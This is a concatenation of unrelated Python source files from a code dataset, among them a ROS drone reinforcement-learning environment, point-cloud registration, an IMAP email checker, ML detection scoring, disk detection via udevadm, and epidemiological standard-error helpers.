Z.append(p0[2] + v[2] * t + R * np.sin(theta2) * n1[2] + R * np.cos(theta2) * n2[2])
#T = (X[j]**2+Y[j]**2+Z[j]**2)**(1/2)
my_col = cm.jet_r(Z[j]/float(Z[j].max()))
ax.plot_surface(X[j], Y[j], Z[j], facecolors = my_col)
#ax.plot_surface(X_diff, X_diff, X_diff, facecolors = my_col)
#ax.plot_surface(X, Y, Z, color = cm.rainbow(255*Jour[i]/60))
#ax.contourf(X, Y, Z, zdir='y', offset=max(y2),cmap=cm.rainbow, vmin=0, vmax=60)
# Tweaking display region and labels
ax.set_xlim(-250, 250)
ax.set_ylim(-250, 250)
ax.set_zlim(-1000, 0)
ax.set_xlabel('X axis')
ax.set_ylabel('Y axis')
ax.set_zlabel('Z axis')
#ax.plot_surface(X2, Y2, Z2, color='black')
#ax.plot_surface(X3, Y3, Z3, color='black')
count = count + 1
m = cm.ScalarMappable(cmap=cm.jet)
m.set_array(range(61))
cbar = plt.colorbar(m)
cbar.ax.set_ylabel('Root age (days)', rotation=270, labelpad=20)
#plt.colorbar(m)
plt.title('DAY = %i' %(day))
plt.tight_layout()
plt.show()
#plt.savefig('/home/renato/groimp_efficient/run_2/figures/root_3d_%i.png'%(day))
#ax=plt.subplot(111, projection='3d')
day = day + 1
| StarcoderdataPython |
5028792 | #!/usr/bin/env python
import rospy
import numpy as np
import math
from math import pi
from geometry_msgs.msg import Twist, Point, Pose
from sensor_msgs.msg import LaserScan
from sensor_msgs.msg import Range
from std_msgs.msg import *
from nav_msgs.msg import Odometry
from std_srvs.srv import Empty
from tf.transformations import euler_from_quaternion, quaternion_from_euler
from datetime import datetime
# pathfollowing
# world = False
# if world:
# from respawnGoal_custom_worlds import Respawn
# else:
# from respawnGoal_3D import Respawn
# import copy
# target_not_movable = False
# Navegation
world = True
from respawnGoal_3D import Respawn
import copy
target_not_movable = True
class Env():
def __init__(self, action_dim=3):
self.goal_x = 0
self.goal_y = 0
self.goal_z = 0
self.heading = 0
self.heading_z = 0
self.initGoal = True
self.get_goalbox = False
self.position = Pose()
self.pub_cmd_vel = rospy.Publisher('/hydrone_aerial_underwater/cmd_vel', Twist, queue_size=5)
self.sub_odom = rospy.Subscriber('/hydrone_aerial_underwater/ground_truth/odometry', Odometry, self.getOdometry)
self.reset_proxy = rospy.ServiceProxy('gazebo/reset_world', Empty)
self.pub_pose = rospy.Publisher("/hydrone_aerial_underwater/ground_truth/pose", Pose, queue_size=5)
self.pub_end = rospy.Publisher("/hydrone_aerial_underwater/end_testing", Bool, queue_size=5)
self.pub_reward = rospy.Publisher("/hydrone_aerial_underwater/rewarded", Bool, queue_size=5)
self.eps_to_test = rospy.get_param('~num_eps_test')
self.counter_eps = 0
self.unpause_proxy = rospy.ServiceProxy('gazebo/unpause_physics', Empty)
self.pause_proxy = rospy.ServiceProxy('gazebo/pause_physics', Empty)
self.respawn_goal = Respawn()
self.past_distance = 0.
self.arriving_distance = rospy.get_param('~arriving_distance')
self.evaluating = rospy.get_param('~test_param')
self.stopped = 0
self.action_dim = action_dim
self.last_time = datetime.now()
#Keys CTRL + c will stop script
rospy.on_shutdown(self.shutdown)
def shutdown(self):
#you can stop turtlebot by publishing an empty Twist
#message
rospy.loginfo("Stopping Simulation")
self.pub_cmd_vel.publish(Twist())
rospy.sleep(1)
def getGoalDistace(self):
goal_distance = math.sqrt((self.goal_x - self.position.x)**2 + (self.goal_y - self.position.y)**2 + (self.goal_z - self.position.z)**2)
self.past_distance = goal_distance
return goal_distance
def getOdometry(self, odom):
self.past_position = copy.deepcopy(self.position)
self.position = odom.pose.pose.position
orientation = odom.pose.pose.orientation
orientation_list = [orientation.x, orientation.y, orientation.z, orientation.w]
_, _, yaw = euler_from_quaternion(orientation_list)
goal_angle = math.atan2(self.goal_y - self.position.y, self.goal_x - self.position.x)
self.heading_z = math.atan2(self.goal_z - self.position.z, math.sqrt((self.goal_x - self.position.x)**2 + (self.goal_y - self.position.y)**2))
# rospy.loginfo("%s", goal_angle_z)
heading = goal_angle - yaw
#print 'heading', heading
if heading > pi:
heading -= 2 * pi
elif heading < -pi:
heading += 2 * pi
self.heading = round(heading, 3)
def getState(self, scan, past_action):
scan_range = []
min_range = 0.6
done = False
for i in range(len(scan.ranges)):
if scan.ranges[i] == float('Inf'):
scan_range.append(20.0)
elif np.isnan(scan.ranges[i]):
scan_range.append(0)
else:
scan_range.append(scan.ranges[i])
if min_range > min(scan_range) or self.position.z < 0.2 or self.position.z > 4.8:
# print(scan_range)
done = True
for pa in past_action:
scan_range.append(pa)
current_distance = math.sqrt((self.goal_x - self.position.x)**2 + (self.goal_y - self.position.y)**2 + (self.goal_z - self.position.z)**2)
# current_distance = math.sqrt((self.goal_x - self.position.x)**2 + (self.goal_y - self.position.y)**2)
if current_distance < self.arriving_distance:
self.get_goalbox = True
return scan_range + [self.heading, self.heading_z, current_distance], done
def setReward(self, state, done):
reward = 0
if done:
rospy.loginfo("Collision!!")
# reward = -550.
reward = -10.
self.pub_cmd_vel.publish(Twist())
if self.get_goalbox:
rospy.loginfo("Goal!! "+str(abs(self.goal_z - self.position.z)))
# reward = 500.
reward = 100#/(abs(self.goal_z - self.position.z)+0.01)
self.pub_cmd_vel.publish(Twist())
if world and target_not_movable:
self.reset()
self.goal_x, self.goal_y, self.goal_z = self.respawn_goal.getPosition(True, delete=True)
self.goal_distance = self.getGoalDistace()
self.get_goalbox = False
if (reward == 100):
self.pub_reward.publish(True)
# else:
# self.pub_reward.publish(False)
return reward, done
def step(self, action, past_action):
linear_vel_x = action[0]
linear_vel_z = action[1]
angular_vel_z = action[2]
# angular_vel_z = action[2]
vel_cmd = Twist()
vel_cmd.linear.x = linear_vel_x
vel_cmd.linear.z = linear_vel_z
vel_cmd.angular.z = angular_vel_z
self.pub_cmd_vel.publish(vel_cmd)
data = None
while data is None:
try:
data = rospy.wait_for_message('/hydrone_aerial_underwater/scan', LaserScan, timeout=5)
except:
pass
state, done = self.getState(data, past_action)
reward, done = self.setReward(state, done)
return np.asarray(state), reward, done
def reset(self):
#print('aqui2_____________---')
rospy.wait_for_service('gazebo/reset_simulation')
try:
self.reset_proxy()
except (rospy.ServiceException) as e:
print("gazebo/reset_simulation service call failed")
data = None
while data is None:
try:
data = rospy.wait_for_message('/hydrone_aerial_underwater/scan', LaserScan, timeout=5)
except:
pass
if self.initGoal:
self.goal_x, self.goal_y, self.goal_z = self.respawn_goal.getPosition()
self.initGoal = False
else:
self.goal_x, self.goal_y, self.goal_z = self.respawn_goal.getPosition(True, delete=True)
# publish the episode time
timer = Twist()
timer.linear.y = (datetime.now() - self.last_time).total_seconds()
self.pub_cmd_vel.publish(timer)
self.last_time = datetime.now()
self.counter_eps += 1
if((self.counter_eps == self.eps_to_test) and self.evaluating == True):
self.pub_end.publish(False)
rospy.signal_shutdown("end_test")
# pose_reset = Pose()
# pose_reset.position.x = -100.0
# self.pub_pose.publish(pose_reset)
self.goal_distance = self.getGoalDistace()
# state, _ = self.getState(data, [0.,0., 0.0])
state, _ = self.getState(data, [0]*self.action_dim)
return np.asarray(state) | StarcoderdataPython |
9705749 | <gh_stars>1-10
import pytest
from pathlib import Path
@pytest.fixture(scope="function")
def parser_check():
data = {"프룬_word" : "프룬",
"프룬_sentence": "프룬이 먹고 싶어",
"의창지_word" : "의창지",
"의창지_sentence" : "의창지를 먹고 싶어",
"금요일_word" : "금요일에 만나요",
"금요일_sentence" : "아이유의 금요일에 만나요를 들으면서 라즈베리를 먹을래",}
return data
@pytest.fixture(scope="function")
def mock_mecab_parser_sentence():
data = {"병원_sentence" : "나는 서울대병원에 갔어"}
return data
@pytest.fixture(scope="function")
def mecab_ner_dir():
python_mecab_ner_dir = Path(__file__).resolve().parent.parent.joinpath("python_mecab_ner", "data", "ner_data")
data = {"python_mecab_ner": python_mecab_ner_dir}
return data
| StarcoderdataPython |
1884273 | # -*- coding: utf-8 -*-
"""
@author: <NAME>
@email: <EMAIL>
@time: 8/18/21 11:02 AM
"""
import time
import transforms3d as t3d
import copy
from helpers import *
from dataset import Reader
VOXEL_SIZE = 5
VOXEL_SIZE_FINE = 3
VISUALIZE = True
def main():
global_registrations = [get_teaser_solver]
global_registration = get_teaser_solver
statistics = {global_registration: {'method': global_registration,
'model': [],
's#': [],
't#': [],
'r': [],
't': [],
'time_global': [],
'time_local': []} for global_registration in global_registrations}
output_path = './data/TUW_TUW_data/'
output_json_path = output_path + 'data.json'
dl = Reader()
dl.read(output_json_path)
for i in range(len(dl)):
source = dl[i]
# print('registering', source['instance'], '\n source', source['pc_artificial'], '\n target', source['pc_model'])
# Load and visualize two point clouds from 3DMatch dataset
# A_pcd_raw = o3d.io.read_point_cloud('./data/cloud_bin_0.ply')
# B_pcd_raw = o3d.io.read_point_cloud('./data/cloud_bin_4.ply')
A_pcd_raw, B_pcd_raw = source['pc_model'], source['pc_artificial']
translation_gt, orientation_gt = source['pose'][:3, 3], t3d.euler.mat2euler(source['pose'][:3, :3])
A_pcd_raw.paint_uniform_color([0.0, 0.0, 1.0]) # show A_pcd in blue
B_pcd_raw.paint_uniform_color([1.0, 0.0, 0.0]) # show B_pcd in red
# draw_registration_result(source=A_pcd_raw, target=B_pcd_raw, transformation=source['pose'])
# if VISUALIZE:
# if VISUALIZE:
# o3d.visualization.draw_geometries([A_pcd_raw,B_pcd_raw]) # plot A and B
# voxel downsample both clouds
A_pcd_fine = A_pcd_raw.voxel_down_sample(voxel_size=VOXEL_SIZE_FINE)
B_pcd_fine = B_pcd_raw.voxel_down_sample(voxel_size=VOXEL_SIZE_FINE)
# voxel downsample both clouds
A_pcd = A_pcd_raw.voxel_down_sample(voxel_size=VOXEL_SIZE)
B_pcd = B_pcd_raw.voxel_down_sample(voxel_size=VOXEL_SIZE)
# if VISUALIZE:
# o3d.visualization.draw_geometries([A_pcd,B_pcd]) # plot downsampled A and B
print('registering', source['instance'], '\n sensor', A_pcd, '\n CAD', B_pcd)
A_xyz = pcd2xyz(A_pcd) # np array of size 3 by N
B_xyz = pcd2xyz(B_pcd) # np array of size 3 by M
time_0 = time.time()
# extract FPFH features
A_feats = extract_fpfh(A_pcd,VOXEL_SIZE)
B_feats = extract_fpfh(B_pcd,VOXEL_SIZE)
# establish correspondences by nearest neighbour search in feature space
corrs_A, corrs_B = find_correspondences(A_feats, B_feats, mutual_filter=True)
A_corr = A_xyz[:,corrs_A] # np array of size 3 by num_corrs
B_corr = B_xyz[:,corrs_B] # np array of size 3 by num_corrs
num_corrs = A_corr.shape[1]
print(f'FPFH generates {num_corrs} putative correspondences.')
# visualize the point clouds together with feature correspondences
points = np.concatenate((A_corr.T,B_corr.T),axis=0)
lines = []
for i in range(num_corrs):
lines.append([i,i+num_corrs])
colors = [[0, 1, 0] for i in range(len(lines))] # lines are shown in green
line_set = o3d.geometry.LineSet(
points=o3d.utility.Vector3dVector(points),
lines=o3d.utility.Vector2iVector(lines),
)
line_set.colors = o3d.utility.Vector3dVector(colors)
o3d.visualization.draw_geometries([A_pcd,B_pcd,line_set])
# robust global registration using TEASER++
NOISE_BOUND = VOXEL_SIZE
teaser_solver = get_teaser_solver(NOISE_BOUND)
teaser_solver.solve(A_corr, B_corr)
solution = teaser_solver.getSolution()
R_teaser = solution.rotation
t_teaser = solution.translation
T_teaser = Rt2T(R_teaser, t_teaser)
# Visualize the registration results
A_pcd_T_teaser = copy.deepcopy(A_pcd).transform(T_teaser)
# if VISUALIZE: o3d.visualization.draw_geometries([A_pcd_T_teaser,B_pcd])
# local refinement using ICP
# icp_sol = o3d.registration.registration_icp(
# A_pcd, B_pcd, NOISE_BOUND, T_teaser,
# o3d.registration.TransformationEstimationPointToPoint(),
# o3d.registration.ICPConvergenceCriteria(max_iteration=100))
# T_icp = icp_sol.transformation
# local refinement using ICP
NOISE_BOUND = VOXEL_SIZE * 0.4
icp_sol = o3d.pipelines.registration.registration_icp(
A_pcd_fine, B_pcd_fine, NOISE_BOUND, T_teaser,
o3d.pipelines.registration.TransformationEstimationPointToPoint(),
o3d.pipelines.registration.ICPConvergenceCriteria(max_iteration=100))
print('time cost', time.time() - time_0)
T_icp = icp_sol.transformation
orientation, translation = t3d.euler.mat2euler(icp_sol.transformation[:3, :3]), icp_sol.transformation[:3, 3]
# t error
rms_error_t = translation_gt - translation
rms_error_t = np.linalg.norm(rms_error_t)
# rotation error
rms_error_r = np.asarray(orientation_gt) - orientation
rms_error_r = np.linalg.norm(rms_error_r)
print('registering', source['instance'], '\n sensor', A_pcd, '\n CAD', B_pcd)
print(' sigma', source['sigma'])
print(' rotation error', np.rad2deg(rms_error_r))
print(' translation error', rms_error_t)
print()
statistics[global_registration]['model'].append(source['instance'])
statistics[global_registration]['r'].append(np.rad2deg(rms_error_r))
statistics[global_registration]['t'].append(rms_error_t)
# visualize the registration after ICP refinement
A_pcd_T_icp = copy.deepcopy(A_pcd).transform(T_icp)
if VISUALIZE: o3d.visualization.draw_geometries([A_pcd_T_teaser,B_pcd])
if VISUALIZE: o3d.visualization.draw_geometries([A_pcd_T_icp,B_pcd])
for reg in statistics.keys():
for i, id in enumerate(statistics[reg]['model']):
print(' ', reg, id, '\n ',
statistics[reg]['time_global'][i] + statistics[reg]['time_global'][i])
if __name__ == '__main__':
main()
| StarcoderdataPython |
6472742 | <reponame>weleen/MGH.pytorch
# encoding: utf-8
"""
@author: liaoxingyu
@contact: <EMAIL>
"""
from torch.utils.data import Dataset
from fastreid.utils.misc import read_image
class CommDataset(Dataset):
"""compatible with un/semi-supervised learning"""
def __init__(self, datasets, transform=None, relabel=True):
if isinstance(datasets, list):
self.datasets = datasets # add this property to save the original dataset information
else:
self.datasets = [datasets]
self.img_items = list()
self.transform = transform
if relabel:
# Please relabel the dataset in the first epoch
start_pid = 0
start_camid = 0
for data_ind, dataset in enumerate(self.datasets):
pids = sorted(list(set([d[1] for d in dataset.data])))
cams = sorted(list(set([d[2] for d in dataset.data])))
pid_dict = dict([(p, i) for i, p in enumerate(pids)])
cam_dict = dict([(p, i) for i, p in enumerate(cams)])
for idx, data in enumerate(dataset.data):
new_data = (data[0], pid_dict[data[1]] + start_pid, cam_dict[data[2]] + start_camid)
self.datasets[data_ind].data[idx] = new_data
added_pid, added_camid = dataset.parse_data(self.datasets[data_ind].data)
start_pid += added_pid
start_camid += added_camid
self.img_items.extend(self.datasets[data_ind].data)
else:
for dataset in self.datasets:
self.img_items.extend(dataset.data)
@property
def datasets_size(self):
return [len(dataset.data) for dataset in self.datasets]
def __len__(self):
return len(self.img_items)
def __getitem__(self, index):
img_path, pid, camid = self.img_items[index]
img = read_image(img_path)
if self.transform is not None: img = self.transform(img)
return {
"images": img,
"targets": int(pid),
"camids": camid,
"img_paths": img_path,
"index": int(index)
}
@property
def num_classes(self):
class_set = set([item[1] for item in self.img_items])
if -1 in class_set: return len(class_set) - 1
return len(class_set)
@property
def num_cameras(self):
return len(set([item[2] for item in self.img_items]))
| StarcoderdataPython |
8118801 | #!/usr/bin/env python3
# The email checker script.
import os
import yaml
import logging
import email
#import bell_slap
from random import randint
from time import sleep
from imapclient import IMAPClient
# Store where we currently are in the filesystem.
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
# Attempt to read in the configuration.
with open(os.path.join(__location__, "config.yml"), 'r') as stream:
try:
config = yaml.load(stream, Loader=yaml.FullLoader)
except yaml.YAMLError as exc:
print(exc)
# Log into email server.
server = IMAPClient(config['email']['imap_host'])
server.login(config['email']['username'], config['email']['password'])
# See how many messages are in the inbox.
select_info = server.select_folder('INBOX')
logging.info('Messages in INBOX: %d' % select_info[b'EXISTS'])
# See if there are any new messages.
messages = server.search('UNSEEN')
logging.info("Unread messages: %d\n" % len(messages))
from_contains = config['conditions']['from_contains']
subject_contains = config['conditions']['subject_contains']
# Process unread messages. When message is fetched, it's marked as 'seen'.
for msgid, message_data in server.fetch(messages, ['RFC822']).items():
email_message = email.message_from_bytes(message_data[b'RFC822'])
email_from = email_message.get('From')
email_subject = email_message.get('Subject')
# Check if the email from address and subject match our conditions.
if from_contains in email_from and subject_contains in email_subject:
print("Found matching email: %s\n" % email_subject)
#bell_slap.slap_the_bell()
# Sleep for a few seconds between dings.
#sleep(randint(1, 5))
server.logout()
| StarcoderdataPython |
8159099 | """
Piąty etap. Po wyodrebnieniu dobrze czasowo detekcji angażujemy do oceny detekcji modele ML (CNN, STD,baseline)
Finalnie oceniamy szanse % na to czy dany obraz jest sygnałem
"""
import os
from ML_function import preprocessData,CNN_classifier,STD_classifier,preprocesDataSTD,preprocesDataBL,BL_classifier,BaseTrigger
import cv2
import json
import glob
import joblib
from joblib import dump, load
#import cpickle
from path_links import main_path,png_detections_path,good_detections_path
#ML MODELE
#DWUKLASOWE MODELE - WSZYSTKIE
model_list_CNN = {'CNN_small_w0':(0,),'CNN_big_w0':(0,),
'CNN_small_w2':(2,),'CNN_big_w2':(2,),
'CNN_small_w0_2':(0,2,),'CNN_big_w0_2':(0,2,),
'CNN_small_w2_10':(2,4,6,8,10,),'CNN_big_w2_10':(2,4,6,8,10,),
'CNN_small_w20':(20,),'CNN_big_w20':(20,),
'CNN_small_w2_20':(2,4,6,8,10,12,14,16,18,20,),'CNN_big_w2_20':(2,4,6,8,10,12,14,16,18,20,),
'CNN_small_raw':('raw',),'CNN_big_raw':('raw',)}
#BASE
model_list_baseline = ['baseline','baseline_knn','baseline_rf']
#CZTEROKLASOWE - PROBLEM ZGODNOSCI ORAZ MASZYNY
model_list_STD= ['etc','bagsvc','gbc','knn','mlp','nsv','ovo_mlp','ovo_svm','ovr_mlp','rf','svm','vot']
def read_detections():
global list_images_name, images, falki
year_list = ["2021"]
#Pętla po rok,dzien,miesiac - zapisuje detekcje po naszym starym filtrze wg danego dnia
for year in year_list:
ypath = png_detections_path + year + "/"
months = [f for f in os.listdir(ypath) if os.path.isdir(os.path.join(ypath, f))]
for month in months:
mpath = ypath + str(month) + "/"
days = [f for f in os.listdir(mpath) if os.path.isdir(os.path.join(mpath, f))]
for day in days:
print("***************")
print(year, month, day)
print("***************")
images = []
list_images_name = []
location = year + "/" + month + "/" + day
detect_dict,json_dict,file_name = read_json_detections(location)
for img in glob.glob(png_detections_path + location + "/*.png"):
n = cv2.imread(img)
#n = cv2.resize(n, (60,60), interpolation = cv2.INTER_AREA)
size_xy=60
n = n[2:2 + size_xy, 2:2 + size_xy]
#cv2.imshow("cropped", crop_img)
#print(n.shape)
img = img.split(location + '/')
img = img[1].replace(".png","")
list_images_name.append(img)
images.append(n)
detect_dict_final = ML_anallyze(images,list_images_name,detect_dict)
json_dict_update = update_detections(json_dict,detect_dict_final)
file_names = file_name.replace(".json","")
with open(good_detections_path+location+"/"+ file_names+"_final.json", 'w') as json_file:
dictionary = {"detections":[detect_dict_final]}
json.dump(dictionary, json_file, indent=4)
with open(good_detections_path+location+"/"+ file_names+"_update.json", 'w') as json_file:
dictionary = json_dict_update
json.dump(dictionary, json_file, indent=4)
def read_json_detections(location):
pathes = good_detections_path+location+"/"
files_day = [f for f in os.listdir(pathes) if os.path.isfile(os.path.join(pathes, f))]
dict_detect = {}
json_dict = {"detections": []}
for file in files_day:
if ".json" in str(file) and "final.json" not in str(file) and "update.json" not in str(file):
file_name=file
current_file = pathes + file
with open(current_file) as json_file:
json_load = json.load(json_file)
for detection in json_load['detections']:
id = str(detection["id"])
if str(detection["good_bright"]) == "True":
ocena = "0,signal" #signal
else:
ocena = "1,artefact" #artefact
dict_detect[id]={"anti-artefact":ocena}
json_dict["detections"].append(detection)
return dict_detect,json_dict,file_name
def update_detections(json_dict,detect_dict_final):
for detection in json_dict["detections"]:
id = str(detection["id"])
if id in detect_dict_final:
score = detect_dict_final[id]["dobry_kandydat"]
detection["ML_score"] = score
return json_dict
def ML_anallyze(images,list_images_name,detect_dict):
# DWUKLASOWE - CNN
for model in model_list_CNN:#model_list_CNN_test:
falki=model_list_CNN[model]
feature_array = preprocessData(data=(images), wavelets=falki)
#print("elementów: ",len(feature_array))
if feature_array.size >1:
try:
print(model)
# print("feature_array: ", feature_array.shape)
tmp = CNN_classifier(model, list_images_name, feature_array)
for i in range(len(tmp)):
detect_dict[tmp.loc[i]['Hit ID']][tmp.loc[i]['Classifier']]=int(tmp.loc[i]['Class'])
except Exception as e:
print(e)
print("cos nie tak")
else:
print("feature_array nie jest prawidłowy")
print("&&&&&&&& STD MODELS &&&&&&&")
feature_array2 = preprocesDataSTD(images) #Dla STD
for model in model_list_STD:
print(model)
try:
tmp = STD_classifier(model,list_images_name,feature_array2)
for i in range(len(tmp)):
detect_dict[tmp.loc[i]['Hit ID']][tmp.loc[i]['Classifier']]=int(tmp.loc[i]['Class'])
except Exception as e:
print("error")
print(e)
print("&&&&&&&& BASELINE MODELS &&&&&&&")
feature_arrayBL = preprocesDataBL(images) # Dla baseline
for model in model_list_baseline:
print(model)
try:
tmp = BL_classifier(model, list_images_name, feature_array2)
for i in range(len(tmp)):
detect_dict[tmp.loc[i]['Hit ID']][tmp.loc[i]['Classifier']] = int(tmp.loc[i]['Class'])
except Exception as e:
print(e)
anty,ML = 0,0
for element in detect_dict:
ocena = []
#0 - sygnał, 1 -artefakt
for klasyfikator in detect_dict[element]:
value_class=-1#nie ustawiony
if klasyfikator in model_list_CNN or klasyfikator in model_list_baseline:
if detect_dict[element][klasyfikator]==0:
value_class = str(detect_dict[element][klasyfikator])+",signal"
else:
value_class = str(detect_dict[element][klasyfikator])+",artefact"
if klasyfikator in model_list_STD:
if detect_dict[element][klasyfikator]<3:
value_class = str(detect_dict[element][klasyfikator])+",signal"
else:
value_class = str(detect_dict[element][klasyfikator])+",artefact"
if klasyfikator == "anti-artefact":
value_class = detect_dict[element][klasyfikator]
detect_dict[element][klasyfikator] = value_class
if value_class !=-1:
ocena.append(value_class)
score = ((ocena.count("0,signal")+ocena.count("1,signal")+ocena.count("2,signal"))/len(ocena))*100
detect_dict[element]["dobry_kandydat"]= round(score,2)
if score>80: #im ocena bliższa 0 tym wieksza szansa na sygnał, im bliżej 1 tym wieksza szansa na artefact
ML+=1
if detect_dict[element]["anti-artefact"]==0:
anty+=1
print(anty,ML)
return(detect_dict)
def main():
read_detections()
if __name__ == '__main__':
main() | StarcoderdataPython |
207590 | import csv
import os
import glob
import argparse
import numpy as np
def merge_csv_files(src_dir, dst_dir):
'''
Takes a list of csv files (full file path) and merges them into a
single output.
'''
# Create a list of all the md files in the given directory
csv_list = glob.glob(os.path.join(src_dir, '*_md.csv'))
csv_list.sort() # This will sort by frame number
# extract the flight name (i.e. date) from one of the csv files
fname = os.path.basename(csv_list[0])
flight_id = fname.rsplit('_', 2)[0].split('/')[-1]
yyyy, mm, dd = flight_id.split('_')
aggregate_data = []
# Read each file and add it to the aggregate list
for file in csv_list:
data = read_md_file(file)
aggregate_data.append(data)
dst_name = 'GR_{}{}{}_metadata.csv'.format(yyyy, mm, dd)
dst_file = os.path.join(dst_dir, dst_name)
# Write the aggregated data to a single output file
write_merged_md(dst_file, aggregate_data)
def read_md_file(md_file):
'''
Reads a single metadata file and returns the relevant information
'''
qa = 0
snow, gray, pond, ocean, shadow = 0, 0, 0, 0, 0
# Get the frame number from the filename
fname = os.path.basename(md_file)
frame = int(fname.split('_')[3])
with open(md_file, 'r') as md:
csv_reader = csv.reader(md)
# Remove the header
try:
next(csv_reader)
for row in csv_reader:
qa = float(row[0])
snow = float(row[1])
gray = float(row[2])
pond = float(row[3])
ocean = float(row[4])
try:
shadow = float(row[5])
except IndexError:
shadow = 0
except Exception as e: # Make sure empty files don't crash the tool
print('Caught exception: ' + str(e))
print('File: ' + md_file)
data = [frame, qa, snow, gray, pond, ocean, shadow]
return data
def write_merged_md(dst_file, aggregate_data):
print("Writing to {}...".format(dst_file))
with open(dst_file, 'w') as md:
csv_writer = csv.writer(md)
csv_writer.writerow(["Frame", "Quality Score", "White Ice",
"Gray Ice", "Melt Ponds", "Open Water", "Shadow"])
csv_writer.writerows(aggregate_data)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("src_dir",
help="Source directory containing *_md.csv files.")
parser.add_argument("--dst_dir", default=None,
help="folder to place the merged data file")
args = parser.parse_args()
#src_dir = os.path.dirname(args.src_dir)
src_dir = args.src_dir
dst_dir = args.dst_dir
if dst_dir is None:
dst_dir = os.path.split(src_dir)[0]
#else:
# dst_dir = os.path.dirname(dst_dir)
merge_csv_files(src_dir, dst_dir)
if __name__ == '__main__':
main()
| StarcoderdataPython |
9647549 | import subprocess
import os
class DiskInfo(object):
def __init__(self, devname):
self.name = devname
self.wwn = None
self.path = None
self.model = ''
self.size = 0
self.driver = None
self.mdcontainer = ''
devnode = '/dev/{0}'.format(devname)
qprop = subprocess.check_output(
['udevadm', 'info', '--query=property', devnode])
if not isinstance(qprop, str):
qprop = qprop.decode('utf8')
for prop in qprop.split('\n'):
if '=' not in prop:
continue
k, v = prop.split('=', 1)
if k == 'DEVTYPE' and v != 'disk':
raise Exception('Not a disk')
elif k == 'DM_NAME':
raise Exception('Device Mapper')
elif k == 'ID_MODEL':
self.model = v
elif k == 'DEVPATH':
self.path = v
elif k == 'ID_WWN':
self.wwn = v
elif k == 'MD_CONTAINER':
self.mdcontainer = v
attrs = subprocess.check_output(['udevadm', 'info', '-a', devnode])
if not isinstance(attrs, str):
attrs = attrs.decode('utf8')
for attr in attrs.split('\n'):
if '==' not in attr:
continue
k, v = attr.split('==', 1)
k = k.strip()
if k == 'ATTRS{size}':
self.size = v.replace('"', '')
elif (k == 'DRIVERS' and not self.driver
and v not in ('"sd"', '""')):
self.driver = v.replace('"', '')
if not self.driver and 'imsm' not in self.mdcontainer:
raise Exception("No driver detected")
@property
def priority(self):
if self.model.lower() in ('thinksystem_m.2_vd', 'thinksystem m.2'):
return 0
if 'imsm' in self.mdcontainer:
return 1
if self.driver == 'ahci':
return 2
if self.driver.startswith('megaraid'):
return 3
if self.driver.startswith('mpt'):
return 4
return 99
def __repr__(self):
return repr({
'name': self.name,
'path': self.path,
'wwn': self.wwn,
'driver': self.driver,
'size': self.size,
'model': self.model,
})
def main():
disks = []
for disk in sorted(os.listdir('/sys/class/block')):
try:
disk = DiskInfo(disk)
disks.append(disk)
except Exception as e:
print("Skipping {0}: {1}".format(disk, str(e)))
nd = [x.name for x in sorted(disks, key=lambda x: x.priority)]
if nd:
open('/tmp/installdisk', 'w').write(nd[0])
if __name__ == '__main__':
main()
| StarcoderdataPython |
6706616 | <reponame>disktnk/chainer-compiler<filename>elichika/tests/node/ndarray/Ceil.py
# coding: utf-8
import chainer
import numpy as np
import testtools
class A(chainer.Chain):
def __init__(self):
super(A, self).__init__()
def forward(self, x):
y1 = np.ceil(x)
return y1
# ======================================
def main():
model = A()
x = (np.random.rand(6, 4).astype(np.float32) - 0.5) * 100.0
testtools.generate_testcase(model, [x])
if __name__ == '__main__':
main() | StarcoderdataPython |
5166910 | <filename>tests/test_visualisation.py<gh_stars>0
"""The script to test visualisation"""
import cryptools.visualisation as vs
import pytest
def test_candle_1():
with pytest.raises(TypeError):
vs.candle([[0, 1, 1, 1]])
def test_candle_2():
with pytest.raises(TypeError):
vs.candle([0, 1, 1, 1])
| StarcoderdataPython |
75718 | <reponame>ihmeuw/cascade-at
import numpy as np
from scipy import stats
from cascade_at.dismod.constants import DensityEnum
from cascade_at.core.log import get_loggers
LOG = get_loggers(__name__)
def meas_bounds_to_stdev(df):
"""
Given data that includes a measurement upper bound and measurement lower
bound, assume those are 95% confidence intervals. Convert them to
standard error using.
Standard errors become Gaussian densities.
Replace any zero values with :math:`10^{-9}`.
"""
LOG.debug("Assigning standard error from measured upper and lower.")
bad_rows = np.sum((df.meas_lower > df.meas_value) | (df.meas_value > df.meas_upper))
if bad_rows > 0:
raise ValueError(f"Found data where meas_lower > meas_value or meas_upper < meas_value on {bad_rows} rows")
df["standard_error"] = bounds_to_stdev(df.meas_lower, df.meas_upper)
df["standard_error"] = df.standard_error.replace({0: 1e-9})
df = df.rename(columns={"meas_value": "mean"})
df["density"] = DensityEnum.gaussian
df["weight"] = "constant"
return df.drop(["meas_lower", "meas_upper"], axis=1)
def wilson_interval(prop, ess):
"""
Calculate Wilson Score Interval
Args:
prop: proportion
ess: effective sample size
Returns:
"""
z = stats.norm.ppf(q=0.975)
return np.sqrt(prop * (1 - prop) / ess + z**2 / (4 * ess**2))
def ess_to_stdev(mean, ess, proportion=False):
"""
Takes an array of values (like mean), and
effective sample size (ess) and transforms it
to standard error assuming that the sample
size is Poisson distributed. (Unless you pass a small
sample, in that case will interpolate between
Binomial and Poisson SE).
If you pass a proportion rather than a rate it will
calculate the Wilson's Score Interval instead.
Args:
mean: pd.Series
ess: pd.Series
proportion: (bool) whether or not the measure is a proportion
Returns:
"""
if proportion:
# Calculate the Wilson's Score Interval
std = wilson_interval(prop=mean, ess=ess)
else:
count = mean * ess
# Standard deviation for binomial with measure zero is approximately:
std_0 = 1.0 / ess
# When counts are >= 5, use standard deviation assuming that the
# count is Poisson.
# Note that when count = 5, mean is 5 / sample size.
under_5 = count < 5
std_5 = np.sqrt(5.0 / ess**2)
std = np.sqrt(mean / ess)
# For counts < 5, linearly interpolate between std_0 and std_5,
# replacing the regular standard deviation.
std[under_5] = ((5.0 - count[under_5]) * std_0[under_5] +
count[under_5] * std_5[under_5]) / 5.0
return std
def bounds_to_stdev(lower, upper):
r"""Given an upper and lower bound from a 95% confidence interval (CI),
calculate a standard deviation.
.. math::
\mbox{stderr} = \frac{\mbox{upper} - \mbox{lower}}{2 1.96}
Args:
lower (pd.Series): The lower boound of the CI.
upper (pd.Series): The upper boound of the CI.
Returns:
pd.Series: The standard deviation for that CI.
"""
return (upper - lower) / (2 * stats.norm.ppf(q=0.975))
def check_crosswalk_version_uncertainty_columns(df):
"""
